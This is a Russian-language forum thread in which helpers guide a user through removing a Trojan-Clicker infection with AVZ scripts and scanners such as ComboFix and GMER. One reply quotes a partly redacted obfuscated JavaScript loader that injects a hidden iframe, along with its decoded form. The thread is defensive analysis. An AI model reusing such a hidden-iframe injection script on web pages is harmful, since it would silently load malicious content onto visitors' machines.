Решена TrojanClicker и его последствия

kirey

Пользователь
Сообщения
23
Реакции
1
Проблема такова: Нод32 начал при загрузке браузера Opera выбавать сообщения об угрозе с сайта (ссылка удалена) о TrojanClicker. Причем на этот сайт не заходил уже очень давно. Никаких последствий это не несло поначалу. Сканирование системы самим нодом и CureIt результатов не дало. Примерно через сутки Нод выдал информацию о заражении файла QIP.EXE в автозагрузке и еще одного файла. К сожаленью не запомнил какого. Переустановить qip не удалось. Очень бы хотелось узнать что с системой и как от этого избавится). Заранее спасибо.


Прошу прощения за тему созданную в другом разделе по ошибке.
 
Последнее редактирование модератором:

akok

Команда форума
Администратор
Ассоциация VN
Сообщения
20,620
Реакции
13,981
Эту тему убрал. Тот раздел для файлов с карантином. :)
http://safezone.cc/forum/showthread.php?t=3031

Добавлено через 5 минут 50 секунд
С сайта грузится Trojan-Clicker.JS.Agent.h (ссылку удалил)
Там iframe:

HTML:
<iframe src="*******" width=103 height=125 style="visibility: hidden"></iframe><script>function v4a83f49dcd229(v4a83f49dcd9f7){  return(parseInt(v4a83f4*******68(v4a83*********0a6 () {var v4a83f49dd1877=2; return v4a83f49dd1877;} var v4a83f49dd0107='';for(v4a83f49dd08d6=0; v4a83f49dd08d6<v4a83f49dcf937.length; v4a83f49dd0*******d0107+=(String.fromCharCode(v4a838********7.substr(v4a83f49dd08d6, v4a83f49dd10a6()))));}return v4a83f49dd0107;} document.write(v4a83f49dcf168('3C69667*********4703A2F2F747261636B696E676C6F61642E636F6D2F652F696E646578372********23333206865696768743D323131207374796C653D27646973706C61793A6E6F6E65273E3C2F696672616D653E'));</script>

Который означает
HTML:
<iframe name='9190' src='http://*******.com/e/index7.php' width=233 height=211 style='display:none'></iframe>

Добавлено через 13 минут 46 секунд
AVZ, меню "Файл - Выполнить скрипт" -- Скопировать ниже написанный скрипт-- Нажать кнопку "Запустить".
Код:
begin
 SearchRootkit(true, true);
 SetAVZGuardStatus(true);
 SetServiceStart('RemoveAny', 4);
 QuarantineFile('C:\WINDOWS\system32\Drivers\removeany.sys','');
 DeleteFile('C:\WINDOWS\system32\Drivers\removeany.sys');
 DeleteService('RemoveAny');
 BC_ImportALL;
 ExecuteSysClean;
 BC_Activate;
 RebootWindows(true);
end.
После выполнения скрипта компьютер перезагрузится.

Код:
begin
 CreateQurantineArchive(GetAVZDirectory+'quarantine.zip');
end.


Полученный архив прикрепите к этой теме согласно правил.

Пофиксить в HijackThis следующие строчки
Код:
 R3 - URLSearchHook: (no name) - - (no file)

Повторите логи.

Добавлено через 8 минут 51 секунду
Примерно через сутки Нод выдал информацию о заражении файла QIP.EXE

Таки правильно выдал.
http://habrahabr.ru/blogs/virus/66937/

Скачайте свежий дистрибутив QIP. И мой Вам совет ознакомтесь с этой темой.
 
Последнее редактирование модератором:

kirey

Пользователь
Сообщения
23
Реакции
1
Спасибо большое за быстрый совет. К сожаленью выыполнить все получится только вечером. На работе QIP такую же штуку выдал, но все удачно переустановилось.
И еще один вопрос. Обязательно ли карантинить CLTest.exe? Это прога для настройки (калибровки) монитора. А в автозагрузке чтобы при включении сразу применялись предустановленные настройки.
 

akok

Команда форума
Администратор
Ассоциация VN
Сообщения
20,620
Реакции
13,981
kirey, нет, необязательно.

Поправил скрипт.
 

kirey

Пользователь
Сообщения
23
Реакции
1
Тему с карантином создал. Логи повторяю.
 

ТроПа

Активный пользователь
Сообщения
389
Реакции
333
На данный момент в логах активного заражения не видно.
Проблемы ещё какие-то наблюдаются?
 

kirey

Пользователь
Сообщения
23
Реакции
1
Проблема осталась. Нод периодически продолжает выводить сообщение о Trojan-Clicker.iframe GT
 
Последнее редактирование:

ТроПа

Активный пользователь
Сообщения
389
Реакции
333
Проблема на том же сайте наблюдается или и на других тоже?
 

akok

Команда форума
Администратор
Ассоциация VN
Сообщения
20,620
Реакции
13,981
Скачайте Malwarebytes' Anti-Malware, установите, обновите базы, выберите "Perform Full Scan", нажмите "Scan", после сканирования - Ok - Show Results (показать результаты) - нажмите "Remove Selected" (удалить выделенные). Откройте лог и скопируйте в сообщение.

Скачайте DDS или с зеркала и сохраните на рабочий стол, отключите антивирус и запустите dds.scr, когда сканирование закончится, запакуйте файлы из файлов DDS.txt и Attach.txt и вложите в сообщение
 

kirey

Пользователь
Сообщения
23
Реакции
1
ТроПа
Проблема проявляется при входе в браузер. А сообщение нода о трояне именно с того же сайта.
 

akok

Команда форума
Администратор
Ассоциация VN
Сообщения
20,620
Реакции
13,981
Очистите временные файлы через Пуск-Программы-Стандартные-Служебные-Очистка диска или с помощью ATF Cleaner
- скачайте ATF Cleaner или с зеркала, запустите, поставьте галочку напротив Select All и нажмите Empty Selected.
- если вы используете Firefox, нажмите Firefox - Select All - Empty Selected
- нажмите No, если вы хотите оставить ваши сохраненные пароли
- если вы используете Opera, нажмите Opera - Select All - Empty Selected
- нажмите No, если вы хотите оставить ваши сохраненные пароли
 

kirey

Пользователь
Сообщения
23
Реакции
1
Вот подозреваю, что в этом-то вся и проблема. Ни ATF ни Ccleaner ничего очистить не смогли. Папки с кешем в стандартном месте нет. Поиск по компу тоже ничего не дал. При этом в самой опере файлы кеша можно посмотреть. Саму оперу уже переустанавливал полностью.. Наверно нужно еще раз попытаться снести ее.
 

akok

Команда форума
Администратор
Ассоциация VN
Сообщения
20,620
Реакции
13,981
Поищите в папке All Users.
 

kirey

Пользователь
Сообщения
23
Реакции
1
В All Users тоже ничего подобного нет.
 

akok

Команда форума
Администратор
Ассоциация VN
Сообщения
20,620
Реакции
13,981
kirey, пробуем так
 

kirey

Пользователь
Сообщения
23
Реакции
1
Так тожет чистил. Не помогает. Завтра переустановю оперу с удалением всех закладок и настроек.
 

kirey

Пользователь
Сообщения
23
Реакции
1
Даже переустановка оперы ничего не дала. Почисил кеш и кукисы заодно в IE. Результат тот же самый... Всплывает окно нода с сообщением с угрозой с того сайта.
 

akok

Команда форума
Администратор
Ассоциация VN
Сообщения
20,620
Реакции
13,981
Значит пойтем не стандартным путем.

Проверьте систему при помощи cureit

Скачайте ComboFix здесь, здесь или здесь и сохраните на рабочий стол.

1. Внимание! Обязательно закройте все браузеры, временно выключите антивирус, firewall и другое защитное программное обеспечение. Не запускайте других программ во время работы Combofix. Combofix может отключить интернет через некоторое время после запуска, не переподключайте интернет пока Combofix не завершит работу. Если интернет не появился после окончания работы Combofix, перезагрузите компьютер. Во время работы Combofix не нажимайте кнопки мыши, это может стать причиной зависания Combofix.
2. Запустите combofix.exe, когда процесс завершится, скопируйте текст из C:\ComboFix.txt и вставьте в следующее сообщение или запакуйте файл C:\ComboFix.txt и прикрепите к сообщению.
Прим: В случае, если ComboFix не запускается, переименуйте combofix.exe в combo-fix.exe

Подробнее в "ComboFix. Руководство по применению."

Скачайте Gmer или с зеркала. Запустите программу. После автоматической экспресс-проверки, отметьте галочкой все жесткие диски и нажмите на кнопку Scan. После окончания проверки сохраните его.
 

kirey

Пользователь
Сообщения
23
Реакции
1
Высылаю логи. Проявления трояна пока вроде не было. Буду надеятся, что изчез)) Спасибо вам)
 
Сверху Снизу